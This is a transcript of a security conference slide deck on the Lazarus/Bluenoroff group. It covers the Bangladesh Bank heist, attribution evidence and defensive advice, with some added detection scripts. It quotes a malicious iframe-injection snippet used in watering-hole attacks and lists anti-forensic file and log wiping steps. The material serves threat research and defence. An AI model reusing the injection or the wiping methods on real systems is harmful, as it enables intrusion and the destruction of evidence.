Chasing the Bad Guys from Bangladesh to Costa Rica

Vitaly Kamluk, Director of APAC Research Centre, Kaspersky Lab (@vkamluk)

Session ID: FLE-R01 (#RSAC)

Uploaded by dinhthien, 08-Nov-2018


TRANSCRIPT

Page 1:

Chasing the Bad Guys from Bangladesh to Costa Rica

Session ID: FLE-R01

Vitaly Kamluk, Director of APAC Research Centre, Kaspersky Lab

@vkamluk

Page 2:

# whoami

Few words about the author

Page 3:

# whoami

Photo captions: Eugene Kaspersky, Vitaly Kamluk

12+ years at Kaspersky Lab, 2 years at INTERPOL

Focus: Malware Analysis, Incident Response, Digital Forensics

Position: Head of security researchers in APAC region

Page 4:

Attacks Evolution

Quick overview and latest figures

Page 5:

THE SCALE OF THE THREAT

1994: 1 new virus every hour

2006: 1 new virus every minute

2011: 1 new virus every second

2017: 323,000 new samples every day

Page 6:

THE NATURE OF THE THREAT

90%: Traditional cybercrime

9.9%: Targeted threats to organisations

0.1%: Cyber-weapons

Labels: Targeted attacks, APTs

Page 7:

HOW MALWARE SPREADS

• Exploit kits
• Email
• Social networks
• USB

Page 8:

TARGETED ATTACK RESEARCH

2010: Stuxnet

2011: Duqu

2012: Gauss, Flame, miniFlame

2013: NetTraveler, Miniduke, RedOctober, Icefog, Winnti, Kimsuky, TeamSpy

2014: Epic Turla, CosmicDuke, Regin, Careto / The Mask, Energetic Bear / Crouching Yeti, Darkhotel

2015: Desert Falcons, Hellsing, Sofacy, Carbanak, Equation, Naikon, AnimalFarm, Duqu 2.0, Darkhotel part 2, MsnMM Campaigns, Satellite Turla, WildNeutron, BlueTermite, SpringDragon

2016: ProjectSauron, Saguaro, StrongPity, Ghoul, Fruity Armor, ScarCruft, Poseidon, Lazarus, Lurk, GCMan, Danti, Adwind, Dropping Elephant, Metel

We discover and dissect the world’s most sophisticated threats

Page 9:

Bangladesh Hack

The story of one of the biggest cyberheists in history

Page 10:

THE FIRST ANNOUNCEMENTS


Page 11:

SCHEMATICS OF CYBER HEIST

Diagram labels: US Bank, Corr. Account, Compromised Bank, Offshore Bank, Attacker

Page 12:

SCHEMATICS OF CYBER HEIST (continued)

Diagram labels: US Bank, Corr. Account, Compromised Bank, Offshore Bank, Attacker

Page 13:

BANGLADESH BANK INCIDENT

Watershed event for SWIFT and the global financial industry

High level of sophistication / knowledge – hiding of business/application evidence:

• Deletion of fraudulent payment instructions from database

• Modification of SWIFT messages (end/start of day statements)

• Bypass of integrity verification checks

Customer Security Programme

Page 14:

NOTES FROM SWIFT

• The SWIFT Network and connections to the SWIFT network have not been compromised

• SWIFT does not rely on the customer’s security to secure the SWIFT Network

• Each customer is responsible and accountable for protecting its local environment and access to SWIFT

Page 15:

LAZARUS!

What is this Lazarus actor?

Page 16:

SONY PICTURES INCIDENT (2014)


Page 17:

OPERATION BLOCKBUSTER (2016)

Credits: Novetta

Page 18:

PREVIOUS CAMPAIGNS

Courtesy of Novetta

Page 19:

BUT WAS IT REALLY LAZARUS?

Let’s find that out

Page 20:

PREVIOUS RESEARCH

Diagram (timeline 2015, 2016, 2017): Vietnam, Bangladesh, Philippines: Wiper; Poland: Compromised webserver, Text String; Lazarus; ? ? ?

Page 21:

A BETTER PROOF

Diagram (timeline 2015, 2016, 2017): South East Asia (Vietnam, Bangladesh, Philippines: Wiper); Poland, Mexico, and others (Compromised webserver, Text String); Africa, Costa Rica; Lazarus; ? ? ?

Links drawn between the clusters: Patched files, Config file format, Operation time; Overall design, C2 Protocol, Own PE-loader, Import resolution, Trace format, RC4 key

Page 22:

WORLDWIDE DETECTIONS

Bangladesh, Taiwan, Vietnam, Thailand, Iraq, Malaysia, Indonesia, India, Poland, Ethiopia, Nigeria, Gabon, Kenya, Uruguay, Mexico, Chile, Brazil, Costa Rica

Banks, Casinos, Investment Firms, Cryptocurrency Businesses

source: KSN

Page 23:

INFECTION VECTOR

How do they get in?

Page 24:

WATERING HOLE ATTACKS

Screenshots: Polish website, Mexican website

Page 25:

MALICIOUS CODE INJECTION

document.write("<div width='0px' height='0px'><iframe width='145px' height='146px' style='left:-2144px; position:absolute; top:0px;' src='https://[PATH]/view.jsp?pagenum=1' ...></iframe></div>");
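An added example, not code from the talk, of the check a site owner can run against the injection shown above: it looks at every iframe on a page for the two hiding tricks the snippet uses (an absolutely positioned frame pushed far off-screen, wrapped in a zero-size container) and reports the frame's source host. The sample page is constructed; attacker-redirect.invalid stands in for the [PATH] the slide masks.

```python
"""Flag hidden iframes like the one injected into the compromised sites above."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

OFFSCREEN_PX = 1000  # an absolutely positioned frame this far out is not meant to be seen

# Constructed sample page: one ordinary embed plus a frame modelled on the
# injected snippet. attacker-redirect.invalid is a placeholder for the masked [PATH].
SAMPLE_HTML = """
<html><body>
<iframe width='560' height='315' src='https://video.example.org/embed/42'></iframe>
<div width='0px' height='0px'><iframe width='145px' height='146px'
 style='left:-2144px; position:absolute; top:0px;'
 src='https://attacker-redirect.invalid/view.jsp?pagenum=1'></iframe></div>
</body></html>
"""


def _px(value):
    """Parse '145px', '-2144px' or '0' into an int; None when it is not a pixel value."""
    m = re.fullmatch(r"\s*(-?\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None


def _style(attr):
    """Split a style attribute into a {property: value} dict."""
    pairs = (p.partition(":") for p in (attr or "").split(";"))
    return {k.strip(): v.strip() for k, _, v in pairs if k.strip()}


class IframeAuditor(HTMLParser):
    def __init__(self, site_hosts):
        super().__init__()
        self.site_hosts = set(site_hosts)
        self.div_stack = []   # one bool per open <div>: True if it is zero-sized
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            self.div_stack.append(_px(a.get("width")) == 0 and _px(a.get("height")) == 0)
        elif tag == "iframe":
            self.findings.append(self._assess(a))

    def handle_endtag(self, tag):
        if tag == "div" and self.div_stack:
            self.div_stack.pop()

    def _assess(self, a):
        reasons = []
        st = _style(a.get("style"))
        offsets = [_px(st.get("left")), _px(st.get("top"))]
        if st.get("position") == "absolute" and any(
                v is not None and abs(v) >= OFFSCREEN_PX for v in offsets):
            reasons.append("positioned off-screen")
        if any(self.div_stack):
            reasons.append("inside zero-size container")
        if 0 in (_px(a.get("width")), _px(a.get("height"))):
            reasons.append("zero-size frame")
        host = urlparse(a.get("src") or "").hostname or ""
        if host and host not in self.site_hosts:
            reasons.append("third-party source " + host)
        # A third-party embed alone is normal; hiding tricks on top of it are not.
        return {"src": a.get("src"), "reasons": reasons, "suspicious": len(reasons) >= 2}


def audit_iframes(html, site_hosts):
    """Return one finding per <iframe> in the page, in document order."""
    auditor = IframeAuditor(site_hosts)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for f in audit_iframes(SAMPLE_HTML, {"www.example.org", "video.example.org"}):
        print("SUSPICIOUS" if f["suspicious"] else "ok", f["src"], f["reasons"])
```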

Page 26:

SITE REDIRECTION

Diagram labels: Visitors, Government website, iframe, Other compromised website, Target List, JScript Exploit

Page 27:

MAP OF TARGETS


Page 28:

OTHER TARGETS

Who else do they hit?

Page 29:

More illegal profit

• Mining cryptocurrency on other compromised hosts

• Two crypto-currency businesses compromised

• 63+ ATMs were infected in South Korea

• Two Korean local ATM vendors breached

• EMV credit card writer software backdoored

• Distributed via hacking/carder forums

Page 30:

TACTICS

Some interesting techniques

Page 31:

ANTI-FORENSIC TECHNIQUES

• Wiping files securely:
  • overwrite file with random pattern;
  • rename file to a random name;
  • delete the file using system API;
  • repeatedly create and delete new files.

• Wiping registry values securely:
  • overwrite value with random pattern;
  • delete the registry value;
  • apply the same to all keys recursively.

• Self-cleanup:
  • wipe temp files, configs, components.

• Wiping prefetch files.

• Wiping event log files:
  • initiate event log backup;
  • the system releases the file lock;
  • wipe file securely.

• DLL unloading and self-removal:
  • use a minimalistic 5Kb DLL to initiate external unloading and memory cleaning.

Page 32:

ANTI-FORENSIC TECHNIQUES

Password Protection: 20-31 alpha-numeric characters. Discovered passwords:

Component Isolation: Loader, Encrypted Payload, Keylogger

Diagram labels (steps 1, 2, 3): Isolated subnet for SWIFT, Internal IT system

Page 33:

WHO ARE THEY?

What else do we know about them?

Page 34:

BLUENOROFF: A LAZARUS UNIT

Diagram labels: Lazarus; Bluenoroff

Activities: Cyber Espionage, Cyber Sabotage, Money Theft, Data Exfiltration, DoS, C2 Operation, Infiltration, Backdoors Development, Wiping Attacks, Cryptocurrency Mining

Page 35:

COMPARING THE CODE

LAZARUS CODE:
• No obfuscation
• Standard import resolution
• Non-packed code*
• No network communication
• Secure file-wiping
• English language
• Execution tracing
• Regular engineering operation
• No visible false flags
• Never used VirusTotal

BLUENOROFF CODE:
• Custom code obfuscator
• Obscured import resolution
• Commercial packers (i.e. Enigma, Obsidium)
• Communication with C2 + infrastructure support
• Full scale of anti-forensics
• Korean + English language
• No execution tracing
• Disguise and stealth
• False flag operations
• Uses VirusTotal

Page 36:

LANGUAGE ARTEFACTS

Some Not Bad English:

execute_nroff(%s) - success with exit_code=%08X
execute_nroff(%s) - failed with error=%d
copying to %s failed with error=%d
[FOXIT_READER] : Successfully copied to %s
PDFModulation failed, so logclear will be executed.
Executing real foxit reader with CommandLine = %s.
[LOG_CLEAR] : failed to delete source file.
Receiver :
Sender :
DO_NOT_USE_MM
copy failed [%s]-[%s] with error = %d
copy success [%s]-[%s]
backup_file(%s, %s, %d)=%d
PatchMemory(%s, %d)
[WorkMemory] pid=%d, name=%s

Korean Locale
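An added example, not the speaker's code, that turns the debug strings quoted above into detection content in two ways: matched raw, they are a signature for the tool's binary; converted to regexes, they match the lines its execution tracing writes, which is the "trace format" link the "A better proof" slide lists. The fake string table, the trace lines and the paths in them are constructed.

```python
"""Match the debug strings quoted above, raw in a binary or rendered in trace output."""
import re

# Format strings from the slide. Raw, they are a signature for the tool's binary;
# converted to regexes, they match the lines its execution tracing writes.
ARTEFACTS = [
    "execute_nroff(%s) - success with exit_code=%08X",
    "execute_nroff(%s) - failed with error=%d",
    "copying to %s failed with error=%d",
    "copy failed [%s]-[%s] with error = %d",
    "copy success [%s]-[%s]",
    "[FOXIT_READER] : Successfully copied to %s",
    "PDFModulation failed, so logclear will be executed.",
    "[LOG_CLEAR] : failed to delete source file.",
    "backup_file(%s, %s, %d)=%d",
    "PatchMemory(%s, %d)",
    "[WorkMemory] pid=%d, name=%s",
]

_SPEC = re.compile(r"%(0?\d*)([sdX])")   # the only specifiers these strings use


def format_to_regex(fmt):
    """Turn a printf-style format into an anchored regex for its rendered output."""
    parts, pos = [], 0
    for m in _SPEC.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        width, conv = m.groups()
        if conv == "s":
            parts.append(r"(.+?)")
        elif conv == "d":
            parts.append(r"(-?\d+)")
        else:                                 # %X / %08X: upper-case hex
            parts.append((r"([0-9A-F]{%d})" % int(width)) if width else r"([0-9A-F]+)")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile("^" + "".join(parts) + "$")


RENDERED = [(fmt, format_to_regex(fmt)) for fmt in ARTEFACTS]


def ascii_strings(blob, min_len=8):
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def scan(blob):
    """Return raw artefact strings and (format, captured fields) for rendered trace lines."""
    hits = {"raw": [], "rendered": []}
    for s in ascii_strings(blob):
        if s in ARTEFACTS:
            hits["raw"].append(s)
            continue                      # a raw format is not a rendered line
        for fmt, rx in RENDERED:
            m = rx.match(s)
            if m:
                hits["rendered"].append((fmt, m.groups()))
                break
    return hits


# Constructed inputs: a fragment pretending to be a binary's string table, and
# two trace lines as the formats above would render them. Paths are made up.
SAMPLE_BINARY = (b"MZ\x90\x00" + b"\x00" * 12 + b"PatchMemory(%s, %d)\x00"
                 + b"\x00" * 4 + b"[WorkMemory] pid=%d, name=%s\x00\x01\x02")
SAMPLE_TRACE = (b"execute_nroff(C:\\Temp\\doc.pdf) - success with exit_code=00000000\r\n"
                b"copy success [C:\\Temp\\a.tmp]-[C:\\Temp\\b.tmp]\r\n")

if __name__ == "__main__":
    for kind, items in scan(SAMPLE_BINARY + SAMPLE_TRACE).items():
        for item in items:
            print(kind, item)
```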

Page 37:

FALSE FLAGS

1. Exploit code: chainik, babaLEna, geigeigei3raza, daiadreschainika

2. Enigma Protector

3. Backdoor Commands: kliyent2pondklyuchit, ssylka, ustanavlivat, poluchit, pereslat, derzhat, vykhodit, Nachalo

Page 38:

THE BIGGEST OPSEC FAILURE

From the server logs of a C2 in Europe:

2017-01-18 02:54: Apache Tomcat started on port 8080
2017-01-18 04:10: HTTP GET view.jsp (via VPN in France)
2017-01-18 04:10: Testing bot (via VPN in France)
...
2017-01-18 08:12: Testing bot (via VPN in Korea)
...
2017-01-18 11:12: Testing bot (from IP in North Korea)

175.45.***.***
inetnum: 175.45.176.0 - 175.45.179.255
netname: STAR-KP
descr: Ryugyong-dong
descr: Potong-gang District
role: STAR JOINT VENTURE CO LTD
address: Ryugyong-dong Potong-gang District
country: KP
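The timeline above replayed as an added example (not from the talk): it parses log lines in the slide's format, checks each source address against the inetnum quoted there, and reports the first test that came from inside that range together with how long the operator had kept behind VPN exits before slipping. The log excerpt is reconstructed with a constructed src= field; the VPN exits use RFC 5737 documentation addresses and 175.45.178.17 is a made-up address inside the quoted range (the slide masks the real one).

```python
"""Replay the C2 access timeline above and flag the test that came from the watched range."""
import ipaddress
import re
from datetime import datetime

# The inetnum quoted on the slide; extend this dict as your own watchlist grows.
WATCHED_RANGES = {
    "STAR-KP (country: KP)": list(ipaddress.summarize_address_range(
        ipaddress.ip_address("175.45.176.0"), ipaddress.ip_address("175.45.179.255"))),
}

# Constructed excerpt in the slide's format with a src= field added. The VPN exits
# use RFC 5737 documentation addresses; 175.45.178.17 is a made-up address inside
# the quoted range (the slide masks the real one as 175.45.***.***).
SAMPLE_LOG = """\
2017-01-18 02:54: Apache Tomcat started on port 8080
2017-01-18 04:10: src=192.0.2.10 HTTP GET view.jsp (via VPN in France)
2017-01-18 04:10: src=192.0.2.10 Testing bot (via VPN in France)
...
2017-01-18 08:12: src=198.51.100.7 Testing bot (via VPN in Korea)
...
2017-01-18 11:12: src=175.45.178.17 Testing bot (from IP in North Korea)
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}): (?:src=(\S+) )?(.*)$")


def parse_log(text):
    """Parse lines into events; separators like '...' and malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, msg = m.groups()
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M"), "src": src, "msg": msg})
    return events


def watched_label(src):
    """Name of the watched range containing src, or None (also for missing/masked addresses)."""
    try:
        addr = ipaddress.ip_address(src or "")
    except ValueError:
        return None
    for label, nets in WATCHED_RANGES.items():
        if any(addr in net for net in nets):
            return label
    return None


def first_watched_access(events):
    """Earliest event whose source falls in a watched range, as (event, label), else None."""
    for ev in events:
        label = watched_label(ev["src"])
        if label:
            return ev, label
    return None


def hours_of_vpn_discipline(events, hit):
    """How long the operator kept using VPN exits before the slip, in hours."""
    first_test = next(e for e in events if "Testing bot" in e["msg"])
    return (hit["time"] - first_test["time"]).total_seconds() / 3600


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    hit = first_watched_access(evs)
    if hit:
        ev, label = hit
        print(f"{ev['time']:%Y-%m-%d %H:%M} src={ev['src']} -> {label}; "
              f"VPN used for {hours_of_vpn_discipline(evs, ev):.1f} h before this")
```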

Page 39:

RECENT CONFIRMATION

Source: Group-IB

Page 40:

ATTRIBUTION CONCLUSIONS

1. Someone invested a huge amount of money to frame NK* (*less likely).

2. A third force could be involved to help NK from the outside.

3. If this is truly North Korea, it means we know very little about their current motivation and use of cyber offense.

Page 41:

THE LAST DROP

One more thing…

Page 42:

WANNACRY


Page 45:

ATTRIBUTION

Page 46:

Visible Code Flow Similarity


Page 48:

OBSOLETE LIBRARY

Page 49:

WannaCry socket setup

Page 50:

Lazarus socket setup

Page 51:

DYNAMIC IMPORTS

API address resolution (dynamic import)

Page 52:

CONCLUSIONS

• LAZARUS is one of the most aggressive and persistent APT groups.
• They have the support of dozens (or hundreds?) of people.
• Their unusual financial motivation makes them different from other actors.
• Public exposure doesn’t stop them for long.
• They seem to be switching to hacking and recruiting other hackers.
• They have no obligations, no code of conduct, no moral principles.

Page 53:

RECOMMENDATIONS

Common best practice against APT attacks:
• Make sure you update your software. TEST IT!
• Segregate your networks
• Record your netflow (or whole traffic if you can)
• Use endpoint security solutions, firewalls, etc, but DO MONITOR ALERTS.
• In case of ANY minor infection – get to the ROOT CAUSE of it.

Page 54:

ADVANCED RECOMMENDATIONS

Advanced techniques against APT attacks:
• Enable extensive logging (hint: deploy sysmon)
• Use honeypots and home-built deception
• Use a custom set of yara rules (hint: create your own yara rules)
• Scan network traffic
• Scan and identify reliably all new malware/adware/etc
  • Hint: sometimes “adware” is not what it seems
  • Hint: if you cannot identify the file:
    • Ask VirusTotal
    • Search online
    • Ask security researchers

Page 55:

HOW TO CHANGE THE GLOBAL SECURITY LANDSCAPE?

What we do and what you could do too.

Page 56:

CONNECTING PRIVATE SECTOR TO POLICE

Diagram labels: Expert, Police

Page 57:

BITSCOUT FLAVORS

Minimal: 270Mb

Optimal: 350Mb

Maximal: 750Mb

(size and features increase from Minimal to Maximal)

Page 58:

REMOTE ASSISTANCE IN A NUTSHELL

Diagram labels: Remote Location, Expert, Owner, Police, Trusted Server, Terminal Access; Step 1, Step 2, Step 3

Page 59:

SOLVING THE PROBLEM OF TRUST

Diagram labels: Expert, Owner, Police, A remote system, Physical host, Real HDD, Virtual host, Virtual HDD, Root shell

Page 60:

BITSCOUT FEATURES

• Minimal and robust
• Runs on any old and new hardware
• Records remote user sessions
• Device access authorized by the owner
• Provides multi-user sessions
• Perfect for education
• Lets you build YOUR OWN OS!
• FREE for all and OPEN-SOURCE!

Download Bitscout here: github.com/vitaly-kamluk

Page 61:

THANK YOU!

Vitaly Kamluk, Kaspersky Lab

@vkamluk

github.com/vitaly-kamluk